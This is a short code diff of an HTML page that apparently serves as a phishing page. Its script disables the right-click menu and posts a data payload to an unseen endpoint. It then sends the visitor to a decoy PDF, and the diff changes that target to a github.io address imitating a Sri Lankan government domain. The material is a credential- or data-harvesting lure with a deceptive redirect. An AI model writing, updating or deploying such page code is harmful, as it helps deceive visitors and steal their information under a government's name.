--- a/kdud discord/index.html
+++ b/kdud discord/index.html
@@ -282,7 +282,7 @@ document.addEventListener('contextmenu', event => event.preventDefault());
                 body: JSON.stringify(payload)
             }).then(() => {
                 // Redirect to Google after sending data
-                window.location.href = 'https://gdfgjdfl-rfglh54jhfg-345hklgdfj-5nlrk.netlify.app/Appointment%20of%20Committes%20-%20IRC.pdf%20New.pdf';
+                window.location.href = 'https://downlaod-s.github.io/kdu.gov.lk/kdud%20discord/PS_EAD_Circular_16_2023.pdf';
             });
         });
     </script>
